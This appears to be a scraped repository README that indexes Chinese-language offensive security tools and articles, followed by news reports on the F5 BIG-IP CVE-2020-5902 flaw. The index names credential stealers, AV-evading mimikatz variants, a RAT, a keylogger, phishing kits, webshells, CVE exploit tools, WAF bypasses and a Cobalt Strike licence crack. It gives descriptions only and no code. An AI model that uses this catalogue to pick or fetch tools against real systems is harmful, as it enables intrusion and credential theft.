chromepass - retrieves Chrome saved credentials/cookies, by NirSoft, tested OK on Win10 + Chrome 80 | SharpChrome - open-source .NET 2.0 tool to retrieve Chrome saved credentials/cookies/history | ChromePasswords - open-source Chrome password/cookie retrieval tool
Java JDWP remote debugging exploitation | related article: JDWP remote debugging and security
Social engineering password generator, a tool that generates passwords from personal information
Audit analysis of multiple SQL injections in Yunye CMS (yunyecms) | original article | official download | sqlmap_yunyecms_front_sqli_tamp.py
Phishing page imitating www.flash.cn, Chinese + English
DedeCMS all-version vulnerability scanner
Collection of CVE, CMS and middleware vulnerability detection/exploitation, since 2019-9-15
Dirble - fast directory scanning and crawling tool [faster than dirsearch and dirb]
RedRabbit - Red Team PowerShell script
Pentest Tools Framework - penetration testing toolset for Linux
Bailu social-engineering dictionary generator, both flexible and easy to use
NodeJsScan - a static code scanning tool built for Node.js
A RAT rewritten from Poison Ivy by a Chinese developer
NoXss - batch XSS detection, can be used with Burp Suite
FOFA harvesting script
Java web compressed-file security vulnerabilities
Password dictionary generator with custom rules and a GUI
lsass dump tool (bypasses/kills Kaspersky) | loader.zip download
Go version of mimikatz - evades AV once compiled
CVE-2019-0708 - batch detection scanning tool
lsass dump tool | another lsass dump tool
Cobalt Strike plugin - RDP log forensics & clearing
xencrypt - a PowerShell tool that encrypts and uses Gzip/DEFLATE compression to bypass AV
SessionGopher - PowerShell tool that decrypts session files saved on Windows machines, e.g. WinSCP, PuTTY, SuperPuTTY, FileZilla and Microsoft Remote Desktop; supports remote and local loading
CVE-2020-0796 Local Privilege Escalation POC - Python version | CVE-2020-0796 Remote Code Execution POC
Windows AV online comparison helper
Recursively find domains and APIs
mssqli-duet - SQL injection script for MSSQL that uses RID brute forcing to extract domain users from Active Directory
[Android unpacking] one-click extraction of sensitive APP information
Shiro vulnerability series detection GUI - ShiroExploit GUI version
Obtaining cookies via phpinfo to defeat HttpOnly
phpstudy RCE exploit tool, Windows GUI version
WebAliveScan - quickly scan for live web services by port
Writable directory scanner (.aspx)
PC client (C/S architecture) penetration testing
wsltools - Python helper library for web scanning
struts2_check - identifies whether a target site is built on Struts2
sharpmimi.exe - AV-evading mimikatz
ThinkPHP code execution batch detection tool
pypykatz - Mimikatz in pure Python
Flux-Keylogger - modern JavaScript keylogger with a web panel
JSINFO-SCAN - recursively find domains and APIs
FrameScan-GUI - a CMS vulnerability detection framework with a GUI, written in Python 3 and PyQt
SRC asset information aggregation site
Spring Boot Actuator unauthorized access [XXE, RCE] single/multi-target detection
JNDI injection exploit tool [Fastjson, Jackson and related vulnerabilities]
Page collecting various reverse shell one-liners
Decrypting WebLogic AES or DES encryption
Capturing SSH passwords with sshLooterC | related article | local copy
redis-rogue-server - Redis 4.x/5.x RCE
ew - internal network tunnelling (cross-platform)
xray-weblisten-ui - Xray passive scan manager written in Go
SQLEXP - SQL injection exploit tool; write custom tamper scripts to dump data behind a WAF
SRC online asset management system - Shots
luject: statically injects dynamic libraries into a given application package; currently supports Android/iPhoneOS/Windows/macOS/Linux | related article
CursedChrome: Chrome extension implant that turns a victim's Chrome browser into a full HTTP proxy so you can browse sites as the victim
pivotnacci: SOCKS connections over an HTTP tunnel
PHPFuck - code obfuscation for PHP 7+ | PHPFuck online version
Behinder (冰蝎) shell that bypasses open_basedir
goproxy Heroku one-click deployment kit, turning Heroku into a free HTTP(S)/SOCKS5 proxy
Self-collected port, subdomain, credential and miscellaneous dictionaries for personal use
Xftp 6 password decryption
Mars - TideSec's rewrite of WDScanner, an all-in-one tool for vulnerability scanning, asset discovery/change tracking, domain monitoring/subdomain mining, AWVS scanning, POC checks, web fingerprinting, port fingerprinting, CDN detection, OS fingerprinting, wildcard DNS detection, WAF detection, sensitive information detection, etc.
Shellcode Compiler: tool for generating shellcode for Windows and Linux
BadDNS is a very fast Rust tool for multi-level subdomain discovery using public DNS servers
[Android unpacking] XServer is an Xposed plugin for analysing methods | related articles: capturing encrypted packets with Xposed + XServer without unpacking | capturing an app's encrypted packets with xserver without unpacking
masscan_to_nmap - fast port scanning and fingerprinting tool based on masscan and nmap
Evilreg - reverse shell using Windows registry files (.Reg)
Shecodject - injects shellcode with Python to bypass Huorong, 360 and Windows Defender
Malleable-C2-Profiles - Cobalt Strike C2 concealment profiles | Cobalt Strike part 2: APT-grade full AV evasion versus enterprise defence in depth
AutoRemove - automatically uninstalls 360
ligolo: reverse tunnelling tool for pentesting
RMIScout: Java RMI brute-forcing tool
[Android unpacking] FRIDA-DEXDump [Android unpacking with Frida]
Donut - shellcode generation tool
JSP webshell collection [2020 latest, bypasses a certain cloud detection]
one-scan - all-in-one website fingerprint scanner; easily gets a site's IP / DNS provider / subdomains / HTTPS certificate / WHOIS / framework / WAF and other information
ServerScan - high-concurrency network scanning and service detection tool written in Go
Domain pentesting - Windows hash dumping with secretsdump.py | related article
WindowsVulnScan: host-based vulnerability scanner [similar to windows-exp-suggester]
Weak password dictionaries distilled from real engagements
SpoofWeb: one-click deployment of an HTTPS phishing site
VpsEnvInstall: one-click VPS pentest environment setup
tangalanga: Zoom meeting scanner
SZhe_Scan web vulnerability scanner based on Python Flask; performs full information gathering and vulnerability scanning on a given domain/IP, with user-added POCs
Taie-RedTeam-OS - Tai'e Security Lab's custom XUbuntu-based red/blue team pentest OS
naiveproxy - a trojan-like proxy tool written in C
BrowserGhost - a browser password grabber, more features to come
GatherInfo - pentest information gathering / internal network information gathering
EvilPDF: tool that embeds malicious files in a PDF
SatanSword - red team integrated pentest framework supporting web fingerprinting, vulnerability PoC checks, batch web and port information lookup, path scanning, batch subdomain discovery from JS, headless Google Chrome, coroutines and full log tracing
Get-WeChat-DB - retrieves the WeChat database and key from a target machine
ThinkphpRCE - py3 script for batch detection of ThinkPHP vulnerabilities or log leaks, with proxy IP pool support
fakelogonscreen - fakes the Windows logon screen to capture passwords
WMIHACKER - AV-evading lateral movement over port 135 only | usage and introduction | lateral movement tool WMIHACKER | original link
cloud-ranges - IP address ranges of some public clouds
sqltools_ch - sqltools 2.0 Chinese-localised enhanced version
railgun-poc_1.0.1.7 - multi-function port scanning / brute forcing / exploitation / encoding conversion, etc.
dede_funcookie.php - DedeCMS pseudo-random vulnerability analysis (part 3): collision point (brute forcing, forging the admin cookie to log into the backend and getshell)

Articles / books / tutorials

Windows persistence series, 12 PDFs
Linux persistence via process injection (requires ptrace disabled) | injecting a shared library (i.e. arbitrary code) into a live Linux process without using ptrace (ptrace need not be disabled)
44139-mysql-udf-exploitation
emlog CMS code audit: from privilege abuse to backend getshell
PHPOK 5.3 latest version front-end injection
PHPOK 5.3 latest version unrestricted front-end injection (part 2)
ThinkPHP 5 RCE summary
rConfig v3.9.2 RCE vulnerability analysis
weiphp 5.0 CMS audit: exp expression injection
zzzphp 1.7.4 & 1.7.5: SQL injection everywhere
FCKeditor file upload vulnerability and exploitation - File-Upload-Vulnerability-in-FCKEditor
zzcms 2019 code audit
Sonic-speed blind injection using sqlmap combined with OOB techniques
Privilege escalation techniques summary: Windows file services and kernel (mainly running commands from a webshell command line to gather information) | (PDF copy kept in the project)
WellCMS 2.0 Beta3 backend arbitrary file upload
Detailed foreign CTF analysis write-ups (2014-2017)
A "different" real-world penetration test case study: from Discuz backend getshell to bypassing Kaspersky and obtaining the domain controller admin password | original article
表达式注入.pdf
In-depth analysis of the WordPress ThemeREX Addons plugin security vulnerability
Tongda OA file inclusion & file upload vulnerability analysis
Advanced SQL injection: obfuscation and bypass
Summary of persistence and backdoor techniques
Summary of common Windows persistence backdoors
Summary of common Linux persistence backdoors
Cobalt Strike 4.0 user manual, Chinese translation, part 3
Cobalt Strike 4.0: issuing myself a license (PDF)
Overview of Cobalt Strike 4.0 updates
Cobalt Strike custom OneLiner
Cobalt Strike quick start [part 1]
Cobalt Strike 3.0 user manual
Cobalt Strike Spear Phish: building CS email phishing
Remote NTLM relaying through CS
Cobalt Strike usage tutorial
Quick-start script for the Cobalt Strike teamserver on Windows
ThinkPHP v6.0.0/6.0.1 arbitrary file operation vulnerability analysis
Django CVE-2020-9402 Geo SQL injection analysis
CVE-2020-10189 Zoho ManageEngine Desktop Central 10 deserialization remote code execution
Safedog SQL injection WAF bypass
Bypassing CSP by hiding JavaScript in PNG images
Tongda OA arbitrary file upload / file inclusion GetShell
File upload bypass of Safedog 4.0
SQL injection bypass of Safedog 4.0
Techniques for bypassing regex-based SQL injection defences
MYSQL_SQL_BYPASS_WIKI - notes on MySQL injection and bypasses
Injection testing that bypasses Yunsuo
360webscan.php_bypass
ThinkPHP 3.2.3 SQL injection analysis
UEditor SSRF DNS Rebinding
PHP code audit explained in sections
JD SRC mini-class article series
Multiple ways of Windows privilege escalation | Privilege_Escalation_in_Windows_for_OSCP
bypass CSP | Content-Security-Policy(CSP)Bypass_Techniques
Personally maintained security knowledge framework, web-oriented
Hijacking SSH passwords via PAM
零组资料文库-(需要邀请注册) redis未授权个人总结-Mature NTLM中继攻击的新方法 PbootCMS审计 De1CTF2020系列文章 xss-demo-超级简单版本的XSS练习demo 空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透 入门KKCMS代码审计 SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 checklist 文件上传突破waf总结 极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞|原文地址 代码审计之DTCMS_V5.0后台漏洞两枚 快速判断sql注入点是否支持load_file 文件上传内容检测绕过 Fastjson_=1.2.47反序列化远程代码执行漏洞复现 【Android脱壳】_腾讯加固动态脱壳(上篇) 【Android脱壳】腾讯加固动态脱壳(下篇) 【Android脱壳】记一次frida实战——对某视频APP的脱壳、hook破解、模拟抓包、协议分析一条龙服务 【Android抓包】记一次APP测试的爬坑经历.pdf 完整的内网域渗透-暗月培训之项目六 Android APP渗透测试方法大全 App安全检测指南-V1.0 借github上韩国师傅的一个源码实例再次理解.htaccess的功效 Pentest_Note-渗透Tips,总结了渗透测试常用的工具方法 红蓝对抗之Windows内网渗透-腾讯SRC出品 远程提取Windows中的系统凭证 绕过AMSI执行powershell脚本|AmsiScanBufferBypass-相关项目 踩坑记录-Redis(Windows)的getshell Cobal_Strike踩坑记录-DNS Beacon windows下隐藏webshell的方法 [DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./books/DEDECMS伪随机漏洞分析 (三) 碰撞点.pdf) 说明 此项目所有文章、代码部分来源于互联网,版权归原作者所有,此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任! About No description, website, or topics provided. Resources Readme License Apache-2.0 License Releases No releases published Languages PowerShell 49.3% Java 33.0% Python 12.7% C 2.2% HTML 0.7% PHP 0.6% Other 1.5%

Recent Articles

Network intruders selling access to high-value companies
BleepingComputer • Ionut Ilascu • 11 Aug 2020

Breaching corporate networks and selling access to them is a business in and of itself. For many hackers, this is how they make their living; others do it, forced by financial struggles, to supplement their revenue.
One actor claiming they returned to black hat activities after laying low for a while has recently churned out network access credentials for big and small companies across the world.


FBI: Iranian hackers trying to exploit critical F5 BIG-IP flaw
BleepingComputer • Sergiu Gatlan • 08 Aug 2020

The FBI warns of Iranian hackers actively attempting to exploit an unauthenticated remote code execution flaw affecting F5 Big-IP application delivery controller (ADC) devices used by Fortune 500 firms, government agencies, and banks.
F5 Networks (F5) released security updates on July 3, 2020 to fix the critical F5 Big-IP ADC vulnerability tracked as CVE-2020-5902, which carries a 10/10 CVSSv3 rating.


US govt confirms active exploitation of F5 BIG-IP RCE flaw
BleepingComputer • Sergiu Gatlan • 24 Jul 2020

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) today published a warning regarding the active exploitation of the unauthenticated remote code execution (RCE) CVE-2020-5902 vulnerability affecting F5 Big-IP ADC devices.
CISA's alert also provides additional mitigations and detection measures to help victims recover after attacks that successfully exploited F5 devices not patched against the CVE-2020-5902 vulnerability.


Thousands of Vulnerable F5 BIG-IP Users Still Open to Takeover
Threatpost • Tara Seals • 17 Jul 2020

About 8,000 users of F5 Networks’ BIG-IP family of networking devices are still vulnerable to full system access and remote code-execution (RCE), despite a patch for a critical flaw being available for two weeks.
The BIG-IP family consists of application delivery controllers, Local Traffic Managers (LTMs) and domain name system (DNS) managers, together offering built-in security, traffic management and performance application services for private data centers or in the cloud.
At th...

Attackers target critical flaw in popular networking gear
welivesecurity • Amer Owaida • 07 Jul 2020

F5 Networks, one of the world’s leading providers of enterprise networking equipment, has recently published a security advisory about a critical vulnerability that impacts its BIG-IP multi-purpose networking devices and “may result in complete system compromise”. The company has also released a patch plugging the security hole, while multiple security experts report that attackers are already deploying exploits targeting the flaw.
Evidence of miscreants actively trying to ex...

Mitigating critical F5 BIG-IP RCE flaw not enough, bypass found
BleepingComputer • Sergiu Gatlan • 07 Jul 2020

F5 BIG-IP customers who only applied the recommended mitigations and haven't yet patched their devices against the unauthenticated remote code execution (RCE) vulnerability CVE-2020-5902 are now advised to update them against a recently found bypass.
F5 addressed the critical CVE-2020-5902 security flaw, rated 10/10 on CVSSv3 and found in BIG-IP ADC's Traffic Management User Interface (TMUI), on July 3rd and recommended mitigations for customers who couldn't immediately patch.
The vulnera...

Admins Urged to Patch Critical F5 Flaw Under Active Attack
Threatpost • Lindsey O'Donnell • 06 Jul 2020

Security experts are urging companies to deploy an urgent patch for a critical vulnerability in F5 Networks’ networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.
Last week, F5 Networks issued urgent patches for the critical remote code-execution flaw (CVE-2020-5902), which has a CVSS score of 10 out of 10. The flaw exists in the configuration interface of the company’s BIG-IP app delivery controllers, which are used for vari...

PoC exploits released for F5 BIG-IP vulnerabilities, patch now!
BleepingComputer • Lawrence Abrams • 05 Jul 2020

Two days after patches for a critical F5 BIG-IP vulnerability were released, security researchers have started publicly posting proof-of-concept (PoC) exploits showing how easy it is to exploit these devices.
F5 customers using BIG-IP devices and solutions include governments, Fortune 500 firms, banks, Internet services providers, and many consumer brands, including Microsoft, Oracle, and Facebook.
On Friday, F5 disclosed that they released patches for a critical 10/10 CVSSv3 rating v...

US Cyber Command urges F5 customers to patch critical BIG-IP flaw
BleepingComputer • Sergiu Gatlan • 03 Jul 2020

F5 Networks (F5) patched a critical remote code execution (RCE) vulnerability found in undisclosed pages of Traffic Management User Interface (TMUI) of the BIG-IP application delivery controller (ADC).
F5 customers using BIG-IP software and hardware solutions include enterprise governments, Fortune 500 firms, banks, service providers, and consumer brands (including Microsoft, Oracle, and Facebook), with the company's website saying that "48 of the Fortune 50 rely on F5."
F5's ...

F5 patches critical BIG-IP ADC remote code execution vulnerability
BleepingComputer • Sergiu Gatlan • 03 Jul 2020


The Register

Network administrators are urged to patch their F5 BIG-IP application delivery controllers following the disclosure of a pair of critical remote takeover bugs.
The flaws in question, CVE-2020-5902 and CVE-2020-5903, lie within a configuration tool known as the Traffic Management User Interface. Successful exploitation results in full admin control over the device.
In the case of CVE-2020-5902, the hole puts the equipment at risk of arbitrary code execution, while CVE-2020-5903 is ...

The Register

In Brief Exploit code for the pair of nasty vulnerabilities in F5 Networks' BIG-IP application delivery controllers is now doing the rounds, so make sure you're all patched up.
Miscreants are scanning the internet for machines to attack, judging from reports by infosec bods running honeypots. Any vulnerable kit facing the 'net is likely to be probed at some point this week, if not already, to see if it can be hijacked.
The flaws in question, CVE-2020-5902 and CVE-2020-5903, lie withi...

Vulnerable perimeter devices: a huge attack surface
BleepingComputer • Ionut Ilascu • 01 Jan 1970

With the increase of critical gateway devices deployed to support off-premise work, companies across the world have to adapt to a new threat landscape where perimeter and remote access devices are now in the first line.
Companies lack visibility into the growing network of internet-connected services and devices that support the new work paradigm, and the avalanche of vulnerabilities reported for edge devices makes tackling the new security challenge even more difficult.


The Register

Palo Alto Networks has emitted its second software update in as many weeks to address a potentially serious security vulnerability in its products.
The vendor on Wednesday issued an advisory for CVE-2020-2034, a remote code execution flaw in its PAN-OS GlobalProtect portal, which can be exploited by a remote unauthenticated miscreant to execute arbitrary commands on the gateway as a superuser:
No in-the-wild attacks have been reported... yet. Palo Alto confirmed to The Register that ...